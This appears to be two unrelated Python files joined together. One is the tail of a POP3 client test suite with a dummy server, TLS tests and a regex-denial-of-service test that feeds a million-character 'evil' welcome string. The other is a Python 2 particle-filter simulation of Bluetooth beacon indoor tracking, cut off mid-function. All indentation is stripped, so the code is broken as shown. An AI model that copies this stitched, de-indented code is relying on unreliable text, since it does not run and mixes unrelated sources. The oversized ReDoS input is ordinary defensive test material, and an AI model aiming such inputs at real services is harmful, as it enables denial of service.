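# RETR_RESP mimics a multi-line POP3 response: message headers, a blank line, the body
# lines, and the lone '.' terminator required by RFC 1939.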
class DummyPOP3Handler(asynchat.async_chat):
CAPAS = {'UIDL': [], 'IMPLEMENTATION': ['python-testlib-pop-server']}
enable_UTF8 = False
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = False
self.tls_starting = False
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' % (arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
def cmd_quit(self, arg):
self.push('+OK closing.')
self.close_when_done()
def _get_capas(self):
_capas = dict(self.CAPAS)
if not self.tls_active and SUPPORTS_SSL:
_capas['STLS'] = []
return _capas
def cmd_capa(self, arg):
self.push('+OK Capability list follows')
if self._get_capas():
for cap, params in self._get_capas().items():
_ln = [cap]
if params:
_ln.extend(params)
self.push(' '.join(_ln))
self.push('.')
def cmd_utf8(self, arg):
self.push('+OK I know RFC6856'
if self.enable_UTF8
else '-ERR What is UTF8?!')
if SUPPORTS_SSL:
def cmd_stls(self, arg):
if self.tls_active is False:
self.push('+OK Begin TLS negotiation')
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
tls_sock = context.wrap_socket(self.socket,
server_side=True,
do_handshake_on_connect=False,
suppress_ragged_eofs=False)
self.del_channel()
self.set_socket(tls_sock)
self.tls_active = True
self.tls_starting = True
self.in_buffer = []
self._do_tls_handshake()
else:
self.push('-ERR Command not permitted when TLS active')
def _do_tls_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
# TODO: SSLError does not expose alert information
elif ("SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1] or
"SSLV3_ALERT_CERTIFICATE_UNKNOWN" in err.args[1]):
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self.tls_active = True
self.tls_starting = False
def handle_read(self):
if self.tls_starting:
self._do_tls_handshake()
else:
try:
asynchat.async_chat.handle_read(self)
except ssl.SSLEOFError:
self.handle_close()
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.daemon = True
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
try:
while self.active and asyncore.socket_map:
with self.active_lock:
asyncore.loop(timeout=0.1, count=1)
finally:
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_too_long_lines(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd,
'echo +%s' % ((poplib._MAXLINE + 10) * 'a'))
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
@hashlib_helper.requires_hashdigest('md5')
def test_apop_normal(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
@hashlib_helper.requires_hashdigest('md5')
def test_apop_REDOS(self):
# Replace welcome with very long evil welcome.
# NB The upper bound on welcome length is currently 2048.
# At this length, evil input makes each apop call take
# on the order of milliseconds instead of microseconds.
evil_welcome = b'+OK' + (b'<' * 1000000)
with test_support.swap_attr(self.client, 'welcome', evil_welcome):
# The evil welcome is invalid, so apop should throw.
self.assertRaises(poplib.error_proto, self.client.apop, 'a', 'kb')
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
def test_utf8_raises_if_unsupported(self):
self.server.handler.enable_UTF8 = False
self.assertRaises(poplib.error_proto, self.client.utf8)
def test_utf8(self):
self.server.handler.enable_UTF8 = True
expected = b'+OK I know RFC6856'
result = self.client.utf8()
self.assertEqual(result, expected)
def test_capa(self):
capa = self.client.capa()
self.assertTrue('IMPLEMENTATION' in capa.keys())
def test_quit(self):
resp = self.client.quit()
self.assertTrue(resp)
self.assertIsNone(self.client.sock)
self.assertIsNone(self.client.file)
@requires_ssl
def test_stls_capa(self):
capa = self.client.capa()
self.assertTrue('STLS' in capa.keys())
@requires_ssl
def test_stls(self):
expected = b'+OK Begin TLS negotiation'
resp = self.client.stls()
self.assertEqual(resp, expected)
@requires_ssl
def test_stls_context(self):
expected = b'+OK Begin TLS negotiation'
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(CAFILE)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.check_hostname, True)
with self.assertRaises(ssl.CertificateError):
resp = self.client.stls(context=ctx)
self.client = poplib.POP3("localhost", self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
resp = self.client.stls(context=ctx)
self.assertEqual(resp, expected)
if SUPPORTS_SSL:
from test.test_ftplib import SSLConnection
class DummyPOP3_SSLHandler(SSLConnection, DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.secure_connection()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = True
self.tls_starting = False
@requires_ssl
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse('STLS' in capa.keys())
@requires_ssl
class TestPOP3_TLSClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3.stls()
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
self.client.stls()
def tearDown(self):
if self.client.file is not None and self.client.sock is not None:
try:
self.client.quit()
except poplib.error_proto:
# happens in the test_too_long_lines case; the overlong
# response will be treated as response to QUIT and raise
# this exception
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse(b'STLS' in capa.keys())
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = socket_helper.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt, self.sock))
self.thread.daemon = True
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
# Explicitly clear the attribute to prevent dangling thread
self.thread = None
def server(self, evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except TimeoutError:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(test_support.LOOPBACK_TIMEOUT)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), test_support.LOOPBACK_TIMEOUT)
pop.close()
def testTimeoutNone(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(pop.sock.gettimeout())
pop.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=test_support.LOOPBACK_TIMEOUT)
self.assertEqual(pop.sock.gettimeout(), test_support.LOOPBACK_TIMEOUT)
pop.close()
with self.assertRaises(ValueError):
poplib.POP3(HOST, self.port, timeout=0)
def test_main():
tests = [TestPOP3Class, TestTimeouts,
TestPOP3_SSLClass, TestPOP3_TLSClass]
thread_info = threading_helper.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
case2.py
|
from __future__ import division
import numpy as np
import math # for math.ceil
import matplotlib.pyplot as plt
from numpy.linalg import norm
from numpy.random import uniform
from scipy.stats import multivariate_normal # for bivariate gaussian -> brownian motion ( normal with mu x(t-1), and variance sigma )
from filterpy.monte_carlo import systematic_resample, multinomial_resample , residual_resample, stratified_resample
from scipy.optimize import minimize
from scipy.optimize import fmin_tnc
from matplotlib.patches import Ellipse, Rectangle, Circle
import matplotlib.transforms as transforms
from matplotlib import animation
from matplotlib import collections
from numpy.random import seed
from multiprocessing import Process
from collections import deque as col_deque # for the sliding windows
import copy
#from matplotlib.font_manager import FontProperties
import time
from sklearn.cluster import KMeans
from shapely.geometry import LineString
from shapely.geometry import Point
from shapely.geometry import Polygon
#from shapely.geometry.point import Point
import shapely.affinity
import matplotlib.ticker as mticker
from scipy.interpolate import griddata
from scipy.interpolate import interp2d
import matplotlib.patches as mpatches
from matplotlib import rc
import os
rc('text', usetex=True)
import sys
if len(sys.argv)!=3:
print "run as 'python <script name> <seed no> <output file name>'"
exit(1)
# object of interest: all variables used for single-object tracking are kept as member variables
# and all related functions are class methods instead of global functions
sizeIncrementRatio=1000/762 # sizeIncrementRatio_small_over_large -> when printing to paper, the small maps come out larger and therefore get resized more; we have to handle that.
TOTAL_MULTILATERATION_ACCURACY=0
TOTAL_MULTILATERATION_ITER=0
sensitivityOfResult=0.1
maxSignalError=0
numberOfBlocks=2
#blockWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#blockLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 12
blockWidth=0.5 # 0.7 = 70cm for example
blockLength=2.5
pastCoeff=0.2
totalNumberOfPeople=1
MinWaitingForPerson=0 # min waiting time between each person
MaxWaitingForPerson=20
totalIterNo=6
NumberOfParticles=300
xdims=(0,5) # our office's coordinates
ydims=(0,3)
#xdims=(0,3)
#ydims=(0,2)
movingLimit=1.0
minUsefulSignal=-90
minSignalValue=-100
numberOfReceivers=3
strongSignalDistance=5
#movingTendency=np.array([0.5,0.2])
movingTendency=np.array([0.0,0.0])
prevMotionRepeatProb=0.75
numberOfRooms=0
#roomWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#roomLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 6
roomWidth=2
roomLength=5
# roomPositions = [ [6.75,7] ]
OOIWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /10 * sizeIncrementRatio# beacon representing the person is drawn as circle in the map(ellipse indeed, but looks like a circle due to adjustments)
OOIHeight=OOIWidth
particleWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /400 * sizeIncrementRatio
particleHeight=particleWidth
# these blocking material positions will be added in main function
# make receivers in square shape
receiverWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /30 * sizeIncrementRatio
receiverLength=receiverWidth
receiverPositions=[]
blockPositions=[]
roomPositions=[]
blockMaterials=[]
roomMaterials=[]
WallRoomRatio=0.125 # 0.125: only 1/8 of a room is the 2 walls that we intersect (so the inner area is 14 wall widths out of a total of 16 wall widths of area)
# distance is already calculated for our RSSI before taking material things into account, so no need to think about empty area in the rooms
roomWallWidth=roomWidth * WallRoomRatio # express line width in terms of data points instead of axis units
# since linewidth expands the line towards the inside and the outside in equal amounts (so a roomWallWidth/2 distance check from the rectangle boundary is enough for the collision check)
materials=['concrete']
#materials = ['aluminum','iron', 'concrete', 'brick', 'glass'] # blockMaterials and roomMaterials elements are chosen from this list
materialColors = {'aluminum':'silver','iron':'black', 'concrete':'gray', 'brick':'red', 'glass':'aqua'} # https://matplotlib.org/users/colors.html
#material_SignalDisturbance_Coefficients={'aluminum':10.0, 'iron':9.0, 'concrete':8.0, 'brick':7.0, 'glass':3.0 } # signal attenuation per 1 meter in terms of dBm
material_SignalDisturbance_Coefficients={'aluminum':20.0, 'iron':18.0, 'concrete':16.0, 'brick':14.0, 'glass':6.0 } # signal attenuation per 1 meter in terms of dBm
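# Hedged worked example (illustrative numbers, not measurements): with the coefficients above,
# a beacon-to-receiver path that crosses 0.3 m of concrete (16 dBm per meter) loses an extra
# 0.3 * 16 = 4.8 dBm on top of the free-space path loss, before the +-50% noise factor
# applied in calc_RSSIs_to_Receivers.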
smallestFigureSideInInch=6 # smallest side will be 6 inch
TX_Power=0
rssiAtOne=TX_Power-65
fingerPrintingBeaconPositions=np.array( [ [0.25,2.25], [5, 5 ], [12, 8 ], [11.5, 3 ] ] )
#fingerPrintingBeaconPositions=np.array( [ [0,0], [5, 5 ], [12, 8 ], [13.5,13 ] ] )
fingerPrintingSignalStrengthBeaconsToReceivers=np.array([ [ -92, -89, -88, -87 ], [ -95, -94, -87, -85 ], [ -88, -91, -78, -79 ] ]) # 4 Beacon to each of the 3 receivers
InterpolatedMapForReceivers=None
interpolatedSignalStrenghForAllPositions_forEachReceiver={} # make it a dictionary where the key is 2d position
useFingerPrinting=True # use fingerprinting instead of multi-laterate , choose the 1st nearest valued position
safetyOffset = 10**-10
OverallError=0
numberOfNotFounds=0
#predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7], [2.5,0.2], [3.5,0.15] ])
predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7] ])
def main():
global receiverPositions, blockPositions, roomPositions, blockMaterials, roomMaterials, roomWallWidth
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
#print "processFunction"
seed(int(sys.argv[1]))
print "seed is: " + sys.argv[1]
receiverPositions=getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers)
blockPositions=getBlockPositionsToInstall(xdims=xdims,ydims=ydims,numberOfBlocks=numberOfBlocks) # install blocks without overlapping
#roomPositions=getRoomPositionsToInstall(xdims=xdims,ydims=ydims,numberOfRooms=numberOfRooms,roomBoundary=roomWallWidth/2)
blockMaterials=np.random.choice(materials, numberOfBlocks)
roomMaterials=np.random.choice(materials, numberOfRooms)
AllProcesses=[]
#for i in range(totalNumberOfPeople):
AllProcesses.append(Process(target=processFunction,args=() ) )
for proc in AllProcesses:
proc.start()
sleepAmount=np.random.uniform(low=MinWaitingForPerson,high=MaxWaitingForPerson)
#print "sleepAmount is: " + str(sleepAmount)
time.sleep(sleepAmount)
def processFunction():
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
macID=generateRandomMACID()
while True:
initialPositionOfThePerson=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax], size=(2))
isCollision=False
for blockPosition in blockPositions:
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomIndex, roomPosition in enumerate(roomPositions):
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomWallWidth/2):
isCollision=True
break
if not isCollision:
break
currPerson = OOI(xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson)
iterNo=0
while iterNo < totalIterNo:
animate(iterNo, macID, currPerson, NumberOfParticles,xdims,ydims,maxSignalError,movingLimit,pastCoeff,
minUsefulSignal,minSignalValue,numberOfReceivers,sensitivityOfResult,
strongSignalDistance,movingTendency)
iterNo+=1
def checkIfCoordinateIsInMap(coords,width,height):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
return coords[0]-width/2 >= xmin and coords[0]+width/2 <= xmax and coords[1]-height/2 >= ymin and coords[1]+height/2 <= ymax
class OOI:
def __init__(self,xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson):
# INITIALIZATION STEP, distribute particles on the map
self.particles = create_uniform_particles(xdims,ydims , NumberOfParticles)
self.weights = np.ones(NumberOfParticles) / NumberOfParticles
#beacon_pos = np.array([0.0, 0.0])
#self.beacon_pos = np.array( [(xdims[1]-xdims[0])/4.0,(ydims[1]-ydims[0])/4.0] )
self.beacon_pos=initialPositionOfThePerson
self.prev_walkingNoise=None
self.x_prev = np.zeros((NumberOfParticles, 2)) # prev particles
self.x_pp = np.zeros((NumberOfParticles, 2)) # prev of prev particle
self.receiverPositions = receiverPositions
self.RSSIofReceivers=[] # what the RSSI values for this person are on our receiver devices
self.UnprocessedRSSIofReceivers=[] # BLE fingerprinting needs the raw value to compare its results against the received one (still weakened, since the real-life attenuation has to be simulated)
self.distToReceivers=[]
self.prevCovMatrix=None
self.mu=None
self.max_weighted_particle=None
self.slidingWindows=[col_deque([]) for i in range(len(receiverPositions) ) ]
# actually I should do proper circle-rectangle collision detection here:
# http://jeffreythompson.org/collision-detection/circle-rect.php
# ensure the person does not go out of the map
# movingLimit is the max step length of the person, let's say 1 meter per time step for example
# movingTendency is the tendency of the person to move in a particular direction
def move_beacon_in_map(self,xdims, ydims,movingLimit,movingTendency=np.array([0,0]),roomBoundary=0 ):
# loop over all the blocks; only move if the new position does not intersect any of them
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
xlow = np.maximum(xmin,self.beacon_pos[0]-movingLimit)-self.beacon_pos[0]
xhigh =np.minimum(xmax, self.beacon_pos[0]+movingLimit)-self.beacon_pos[0]
ylow = np.maximum(ymin,self.beacon_pos[1]-movingLimit)-self.beacon_pos[1]
yhigh =np.minimum(ymax, self.beacon_pos[1]+movingLimit)-self.beacon_pos[1]
while True:
walking_noise_x = np.random.uniform(low=xlow,high=xhigh) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh)
#walking_noise = np.zeros(particles.shape)
walkingNoise=np.array( (walking_noise_x,walking_noise_y)).T
#walkingNoise=np.random.uniform(-movingLimit,movingLimit,size=(2,))
if self.prev_walkingNoise is not None:
walkingChoices=[walkingNoise,self.prev_walkingNoise]
walkingNoise = np.copy(walkingChoices[ np.random.choice([0,1], p=(1-prevMotionRepeatProb,prevMotionRepeatProb)) ] ) # choose the prev motion with a higher probability
tmpBeaconPos=self.beacon_pos + walkingNoise + movingTendency
#print "beacon pos is: " + str(self.beacon_pos)
#print "walkingNoise is: " + str(walkingNoise)
isCollision=not checkIfCoordinateIsInMap(tmpBeaconPos, OOIWidth,OOIHeight)
if not isCollision:
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength) or \
findRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,blockPosition,blockWidth,blockLength) is not None :
isCollision=True
break
if not isCollision:
for roomIndex, roomPosition in enumerate(roomPositions):
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth,roomLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomBoundary) or \
findRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,roomPosition,roomWidth,roomLength) is not None :
isCollision=True
break
if not isCollision:
break
self.prev_walkingNoise=np.copy(walkingNoise)
self.beacon_pos = np.copy(tmpBeaconPos)
# use the constant velocity model described on page 32
# for walking, mu is about 0.5 m and the std about 0.2 m,
# so we can say the variance is roughly 0.04 m^2
# p(x_t | x_{t-1}) can be computed as follows: evaluate the Gaussian for p(x_t), then for p(x_{t-1}); p(x_t, x_{t-1}) = p(x_t | x_{t-1}) * p(x_{t-1})
# i.e. it is the probability of both occurring at the same time
# dividing that joint area by p(x_{t-1}) gives the result -> this corresponds to the formula on page 32 (dividing means subtracting the exponents)
# for the velocity term, x(t-1) and x(t-2) must be given; they default to None, and if either is None the velocity cannot be computed,
# so the first predictions are made without it, i.e. they reduce to Brownian motion.
# I could not fully work out what d on page 32 is, so I simply take it to be 1.
# x_prev = x(t-1)
# x_pp = prev of x_prev
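# Small hedged example of the blend used in predict_BLE below (illustrative numbers only):
# with pastCoeff = 0.2, a sampled walking noise of [0.4, -0.1] and a past velocity
# (x_prev - x_pp) of [0.5, 0.0], the proposed displacement is
#   0.8 * [0.4, -0.1] + 0.2 * [0.5, 0.0] = [0.42, -0.08]
# i.e. mostly a random walk, nudged toward the previous direction of motion.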
def predict_BLE( self, no_of_noise_elements, movingLimit, pastCoeff, xdims, ydims, movingTendency=np.array([0,0]) ):
#rand_gaussian_noise=np.random.multivariate_normal(mu=mu,cov=sigma,size=no_of_noise_elements) # Draw random samples from a multivariate normal distribution
#rand_gaussian_noise = 0
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
# ALL PARTICLES SHOULD RESIDE IN THE MAP, CHECK FOR BEING INSIDE FOR EACH PARTICLE (MOVE THAT AMOUNT AT THE BORDERS AT MAX)
# min of x, should not be lower than map's xmin && max of x should not be larger than map's xmax
# meaning low should be max(xmin,particles[:,0]-xmin-movingLimit) && high = min(xmax, xmax-particles[:,0]+movingLimit)
xlow = np.maximum(xmin,self.particles[:,0]-movingLimit)-self.particles[:,0]
xhigh =np.minimum(xmax, self.particles[:,0]+movingLimit)-self.particles[:,0]
ylow = np.maximum(ymin,self.particles[:,1]-movingLimit)-self.particles[:,1]
yhigh =np.minimum(ymax, self.particles[:,1]+movingLimit)-self.particles[:,1]
walking_noise_x = np.random.uniform(low=xlow,high=xhigh,size=self.particles.shape[0]) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh,size=self.particles.shape[0])
##print "walking_noise_x is: " + str(walking_noise_x)
#walking_noise = np.zeros(particles.shape)
walking_noise_x=np.array(walking_noise_x)
walking_noise_y=np.array(walking_noise_y)
walking_noise=np.array( (walking_noise_x,walking_noise_y)).T
if np.count_nonzero(self.x_prev) != 0 and np.count_nonzero(self.x_pp) != 0:
past_velocity = self.x_prev - self.x_pp
change_in_pos = (1-pastCoeff) * walking_noise + pastCoeff * past_velocity # constant_velocity_motion
else:
change_in_pos = walking_noise
#particles +=
self.particles += change_in_pos + movingTendency
# Update the weight of the particles according to the measured beacon position found in the multilateration algorithm for the current time step
def update_weights(self):
distances = np.linalg.norm(self.particles - self.averaged_beacon_pos, axis=1)
self.weights *= np.sum(distances)/distances
# SET ALL WEIGHTS INTERSECTING WITH AN OBSTRUCTION TO ZERO (so that particles do not accumulate on obstructions)
for particleIndex, particle in enumerate(self.particles):
isCollision=False
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomIndex,roomPosition in enumerate(roomPositions):
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth[roomIndex],roomLength[roomIndex]):
#print "room wall width is: " + str(roomWallWidth)
# use roomWallWidth/2, since linewidth expands toward outside and inside (for roomWallWidth, expands roomWallWidth/2 towards inside and roomWallWidth/2 towards outside)
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,roomPosition,roomWidth[roomIndex],roomLength[roomIndex],boundaryForRect=roomWallWidth[roomIndex]/2):
isCollision=True
break
if isCollision:
self.weights[particleIndex]=0
self.weights += 10**(-300) # avoid round-off to zero
self.weights /= sum(self.weights) # normalize
# Resample N_eff
def resample_from_higher_weights(self,tmp_particles, tmp_weights):
#indices = multinomial_resample(weights)
#indices = residual_resample(weights)
#indices = stratified_resample(weights)
indices = systematic_resample(self.weights)
tmp_particles[:] = tmp_particles[indices]
tmp_weights[:] = tmp_weights[indices]
tmp_weights.fill(1.0 / len(tmp_weights))
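# Hedged example of the systematic resampling step above: systematic_resample draws N index
# positions (i + u)/N with a single random offset u, so with weights [0.7, 0.2, 0.1] and N = 10
# it keeps 7 copies of particle 0, 2 of particle 1 and 1 of particle 2, after which all weights
# are reset to 1/N.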
# maxSignalError in dBm
# it should call checkLineSegmentCollision_WithRectangle to lower the signal if the receiver and the beacon are not in "Line of Sight"
def calc_RSSIs_to_Receivers(self,minSignalValue,minUsefulSignal,maxSignalError):
self.RSSIofReceivers[:] = []
self.UnprocessedRSSIofReceivers[:] = []
receiverIndex=0
for receiverPosition in self.receiverPositions:
res_unprocessedRSSI = 0
if(maxSignalError > 0):
res_unprocessedRSSI=weakenedSignal( distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos) ) , maxSignalError )
else:
##print "the norm is: " + str(np.linalg.norm(receiverPosition-self.beacon_pos ))
res_unprocessedRSSI=distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos ) )
#return max(-100,unprocessedRSSI) # Generally signals lower than -100 are not that reliable
isCollision=False
# this is used to weaken the signal in case there was a block or room between the receiver and the beacon(this is real calculation)
# this simulates the signal before we catch it in real life.
weakeningAmount=0 # distance between the receiver and the beacon / 1 meter * ( how many dBm to reduce for 1 meter)
for blockIndex, blockPosition in enumerate(blockPositions):
receiverBeaconBlockIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,blockPosition,blockWidth,blockLength)
if receiverBeaconBlockIntersection is not None:
